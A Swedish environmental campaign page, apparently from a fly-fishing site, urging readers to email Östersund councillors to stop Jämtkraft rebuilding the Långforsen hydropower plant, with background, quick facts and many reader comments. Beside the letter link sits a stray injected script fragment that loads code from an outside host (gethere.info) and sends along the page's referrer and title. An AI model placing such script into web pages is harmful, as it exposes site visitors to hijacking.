Befria Långforsen!

Långan är skyddad mot vattenkraft. Trots det planerar Jämtkraft att bygga ett nytt kraftverk här. Därför ber vi dig nu att – tillsammans med oss och för miljöns skull – hjälpa till att stoppa bygget.
Nu kan du hjälpa till genom att skicka ett brev till AnnSofie Andersson, kommunalråd i Östersund, och visa vad du tycker! Brevet går också för kännedom till AnnSofies kommunalrådskollegor i Krokoms och Åre kommuner, som äger små delar av Jämtkraft. Du klickar enkelt iväg brevet HÄR.

Vi som står bakom kampanjen är:
loggor_graskala2

För dig som vill läsa mer om Långforsen:
Östersunds kommun, som är ägarna till Jämtkraft AB, tog före sommaren det positiva beslutet att Långforsens damm och kraftverk ska monteras ned och forsen återställas. Nyligen har dock Jämtkraft fått tillstånd att bygga om det gamla kraftverket och den delvis raserade dammen. Om det blir verklighet betyder det ett hårt slag mot både miljön och Jämtland som frilufts- och sportfiskedestination. Vi anser att Östersunds kommun måste stå fast vid sitt beslut!

Långan är skyddad mot vattenkraft. Trots det planerar Jämtkraft att bygga ett nytt kraftverk här. Därför ber vi dig nu att – tillsammans med oss och för miljöns skull – hjälpa till att stoppa bygget.

Kraftverksstriden i Långfors har en lång historia. Redan under 1950-talet fanns det planer på att bygga ett storskaligt kraftverk som skulle ersätta det småskaliga som alltjämt ligger kvar på platsen sedan 1918. Under 1980-talet skyddades Långan i denna del mot exploatering, och när miljöbalken infördes 1999, återfanns denna sträcka som skyddad mot vattenkraftsexploateringar.
Trots det har Jämtkraft försökt bygga om och bygga nytt på platsen upprepade gånger. 2004 satte Regeringsrätten ned foten och Jämtkrafts ansökan avslogs av regeringen. Striden har också kantats av skandaler, bland annat kuppade tidigare VD Fiskevårdsområdesföreningens årsmöte vid ett tillfälle, och Jämtkraft hotade också att dra in anslagen till Mittuniversitetet om de inte gick i god för att ett kraftverk i Långfors är bra för den biologiska mångfalden.
Just nu är läget att mark- och miljööverdomstolen lämnat tillstånd till att bygga ett nytt kraftverk på platsen. Detta har överklagats av Sportfiskarna, Älvräddarna och den statliga myndigheten Kammarkollegiet till Högsta Domstolen, HD. Samtliga har i sina överklaganden begärt att HD ska be om ett så kallat förhandsavgörande från EU-domstolen för att klargöra vad som är gällande rätt.
Under tiden vill vi påverka ägarna Östersunds kommun, och där kan du göra en mycket viktig insats genom att skicka brevet nedan.

Snabbfakta

 • Långfors kraftverk byggdes 1918.
 • Långfors är ett småskaligt kraftverk som inte kan användas till att reglera elnätet, eller för att kompensera när vindkraftens produktion går upp och ned.
 • Det har mer eller mindre stått helt still från ungefär 2005, på grund av eftersatt underhåll med stora hål i dammen.
 • När det var i drift producerade det ungefär 2 GWh per år, vilket motsvarar 1/3-dels vindkraftverk av modern typ.
 • Det krävs 2000 kraftverk av Långans storlek för att ersätta ett enda kärnkraftsblock som OKG 1.
 • Långfors energiproduktion motsvarar 1/ 75 000-del av Sveriges totala elproduktion.
 • Långan är en skyddad sträcka i Miljöbalken, vilket innebär att det inte får byggas några vattenkraftverk där.
 • Trots det finns det undantag, t.ex. om en nybyggnation inte medför mer än ”obetydlig miljöpåverkan”. Att Kammarkollegiet, Älvräddarna och Sportfiskarna överklagar beror på att vi anser att mark- och miljööverdomstolen gjort en felaktig bedömning i det fallet.

HÄR SKICKAR DU IVÄG BREVET!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Dela inlägget: Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInEmail this to someone


 • Christer Nyström

  Befria Långforsen!

 • David Appelgren

  Skall det finnas några outbyggda älvar kvar till våra kommande generationer? Skandal!

 • Roger Salen

  Protest

 • Jonas Hagborg

  Stoppa utbyggnaden som enbart byggs för att endast få dessa förbaskade elcertifikatpengar där inga miljökrav finns för att få dessa pengar….vansinne!

 • Henrik Erssom

  Inga fler vatten kraft värk för det dödar allt fiske och torr läger stora områden hur tänker in på

 • Micke Färlin

  Sätt ner foten nu och låt inte Jämkraft domdera med sina medeltida feodalfasoner! Skäms ni inte att hela tiden förstöra Jämtlands fina natur???

 • Henrik Erssom

  Inga fler vatten kraft värk dom dödar fisken

 • Patrik Danroth

  Befria Långforsen!

 • Johan Ekdahl

  Bygg inte ut långforsen !

 • Tomas Andrén

  För dig som vill läsa mer om Långforsen:
  Östersunds kommun, som är ägarna till Jämtkraft AB, tog före sommaren det positiva beslutet att Långforsens damm och kraftverk ska monteras ned och forsen återställas. Nyligen har dock Jämtkraft fått tillstånd att bygga om det gamla kraftverket och den delvis raserade dammen. Om det blir verklighet betyder det ett hårt slag mot både miljön och Jämtland som frilufts- och sportfiskedestination. Jag anser att Östersunds kommun måste stå fast vid sitt beslut!

 • Greger Gustin

  Klart jag är med och kämpar emot detta vansinne ! Bara för att man ger rabatt på el till kommunens befolkning verkar man anses sig få göra vad man vill och skövla naturtillgångar efter eget tycke!

 • Carl-Göran Bååth

  Förstör inte turistnäringen i Norrland.
  Satsa på solenergi och vindkraft !

 • Maria Bjerkheden

  Följ lagen !

 • Marcus Eldh

  Rädda Långforsen!

 • Mattias Lies

  Bevara det sköra vi har kvar. Det är en sann långsiktig investering som vi lämnar vidare åt efterkommande generationer.

 • Claes Thörne

  Skärp er!!!

 • Patrik Lindgren

  Var rädd om naturen!

 • Kjell-Jonas Enarsson

  Bygg ett vindkraftverk som ger dubbelt så mycket el som Långforsen.nn1

 • Mattias Lilje

  Låt fisken vandra fritt i Långan och fisketurismen frodas!

 • Mathias Erbom

  Att förstöra ett sådant vattendrag med ett kraftverk är kriminellt .

 • Niklas Viklund

  Betänk era handlingar samt beslut och dess långsiktiga konsekvenser kontra vinning så blir beslutet enkelt och rätt.

 • Sven-Olof Hagström

  Befria Långforsen.

 • Johan sterner

  Jag ser ett Sverige där man kan husera hur som helst och få sin vilja igenom, det vore en dödsdom om det byggs ett vattenkraftverk för älven. Vad skulle det göra för några få hushåll! Tänk på den fisketurism som går förlorad, där många fler blir drabbade i slutändan. Tack för ordet!

 • Pär Jansson

  Stor skam att ni ens funderar på ny utbyggnad!!

 • Stefan Andersson

  Vad jag förstår så är Långan skyddad mot vattenkraftsutbyggnad så det är väl inget att ens diskutera!!

 • Hans Robertsson

  Bygg inte, bevara älven!

 • Joachim Wallin

  Befria Långforsen från denna ”våldtäkt” på vattendrag som Jämtkraft bedriver!
  Nu räcker det:@

  Hälsningar
  Joachim Wallin
  Lärare i Biologi och Idrott & hälsa/
  Flugfiskare

 • Mattis Johansson

  klart forsen ska va ostörd det är juh en ickefråga

 • Andreas Westlund

  SNÄLLA, NU FÅR DET RÄCKA!
  Vad ska man skriva!? Jag är utan ord.
  Det är så otroligt tråkigt att ens idén kommer upp.
  Vi är många som ständigt jobbar (på vår fritid) med att återställa älvar, åar och bäckar för att djur och natur ska få ha sin naturliga gång och för att visa våra näst kommande generationer hur fint och fridfullt det är runt ett vattendrag.

  Jag hoppas verkligen att ni inte låter detta ske.

  Andreas

 • Per Westerlund

  Stoppa tanken om utbyggnad av Långforsen, Långan är skyddad mot vattenkraft!

 • Mats Ädel

  Stoppa utbyggnaden. Låt Långforsen flöda fritt

 • Janne Eriksson

  Ge fan i det lilla som finns kvar tänk efter är det så vi vill att nästa generation ska minnas oss ?

 • Lars Terkildsen

  Låt Långaforsen flyta fritt, vi behöver fria vattenvägar

 • Fredrik Nygren

  Allt byggs om, gör om gör rätt. sluta bygga ut älvarna och låt fisken ha fria vandringsvägar. gynnar både oss människor och redten av naturen.

 • Nils-Erik Vigren, Rädda Höga Kusten

  Kommunalrådet i Östersunds kommun
  Bästa BrittMarie Andersson!

  Två åtgärder är synnerligen positiva både Östersunds kommun och hela Jämt-lands län! Den ena är att för kommande generationer lämna över de 30 % av era vattendrag som ännu inte är utbyggda. Då hamnar Långforsen i gott sällskap med Tännforsen! Detta skulle vara ovär-derligt för besöksnäringen i både din kommun och ditt län!

  Den andra åtgärden är att värna Jämt-lands rena vatten! Där ligger rikedomen och framtidskapitalet för utvecklingen av hela Jämtlands län som ett både nationellt och internationellt turist-mål! Tänk dig att 2012 flög en miljard turister till olika mål världen över… De har oftast en egenskap gemensam. De älskar en orörd och levande natur!

  Långan är som Du vet ett alldeles ut-märkt öringsvatten. Att det nu i folk-mun kallas för ett grönt dike pga. övergödningseffekterna från fiskod-lingen i Landösjön är ingen anledning för att återuppföra kraftverket i Lång-forsen. Det är lättare att avsluta fiskodlingen i din grannkommun än att riva ett nyuppfört vattenkraftverk…

  Du borde känna till att starka krafter arbetar för att mellan i första hand 400 och 1500 små kraftverk ska rivas för att underlätta för vandrande fisk och ge kiselalgerna möjlighet att nå våra omgivande hav? Betydelsen av detta kan inte överskattas. En av dina parti-kamrater, Agneta Gille, riksdagsleda-mot, har skrivit en motion om önskvärdheten att vi ökar svenska fol-kets kunskap om tiamin, det är för allt liv det nödvändiga B1-vitaminet!

  Jag fördjupar mig inte i ämnet utan konstaterar bara att ett återuppfört kraftverk i Långan skapar en uppdämning som hindrar kiselalgerna att nå ner till Indalsälven. Det är den typen av ”fälla” för kiselalgerna som man vill bli kvitt genom att riva fördäm-ningarna för de små kraftverken.

  Inte heller vill jag fördjupa mig i den sorgliga problematiken av att odla fisk i öppna kassar. Bara några kommentarer!

  Jag uppskattar det säkerligen mycket medvetna dröjsmålet för Juusi Käheris ansökan om att få odla 6 000 ton fisk i Storsjön! Snälla BrittMarie! Fortsätt att förhala! Lämna inte tillstånd! Varje 1 200 ton som odlas ger ett ut-släpp på 5114 kg fosfor enligt de siff-
  som länsstyrelsen i Västernorrland an-vänder. Enligt RHK:s samarbete med SMHI vet vi att minst 80 % av all fosfor som produceras av odlingar i Jämtland och Västerbotten når Bottenhavet.

  Målet för JV:s nationella utredning, där både jag och Charlie Fredriksson, Frösön, har deltagit, är att 50 000 ton fisk ska odlas före 2020. Det skulle innebära att 170 ton fosfor ytterligare skulle tillföras Bottenhavet varje år!

  Östersunds kommun lika väl som Höga Kusten ingår i Bottenhavets vattendi-strikt, Sveriges största. De skall före 2021 spara in 44 ton fosfor till en kostnad för skattebetalarna på minst 1,2 miljarder kronor. Du ska få en mer precis summa i ett kommande brev!

  Hela Sveiges projekt att förhindra att
  700 ton fosfor når våra hav ligger nu på en kostnad fram till 2021 på 30 mil-jarder!Det är skattebetalarna som får stå för kostnaden!

  Detta jag kortfattat berört är allvar-liga problem! Vår regering har nu räddat Ojnareskogen! Stort Tack till (Mp) och (S)! Men det finns fler pro-blem! Tiaminbristen som fisk, fåglar och djur lider av. I det problemområ-det hamnar planerna med ett återupp-byggt kraftverk i Långforsen! Nedsmuts-ningen via vattenbruk med föråldrad teknik är ett annat viktigt problemom-råde. Tänk på att där håller viktiga allianspartier på att ändra inställning!

  Hitta därför en framtidsinriktad miljö-policy tillsammans med miljövännerna inom (S)! Det kommer alltid ett efter-mäle för viktiga politiker!

  Lycka till BrittMarie!

  Nils-Erik Vigren för RHK

 • Johan Ågren

  Låt Långforsen flyta fritt!!

 • Rolf Eklund

  Bevara våra älvar bygg ut vindkraften och solenergin i stället. Tack för ordet.

 • Rode

  vi har nog av döda älvfåror i Sverige och döda älvstränder utan liv. Stränder där det inte finns ett grönt strå för en fågel att häcka på grund av att vattnet höjs o sänks hela tiden så inget liv kan få fäste där. Dessutom har vi fisken som ibland lyckas ta sig genom vattenkraftturbinerna, med halshuggna huvuden och lämlästade kroppar som följd. Har själv sett detta och kan styrka mina påståenden med bilder om så behövs. Detta kallas miljövänligt av alla politiska partier särskilt mycket av MP. Vindkraft är lika dåligt för miljön. Miljoner rovfåglar och småfåglar flyger mot snurrorna som skär halsen av dem och de faller ner döda. Men miljövänligt är det.
  Så ta ert förnuft till fånga, låt Långforsen leva!!MER FRÅN ALLTOMFLUGFISKE.SE

Sponsrad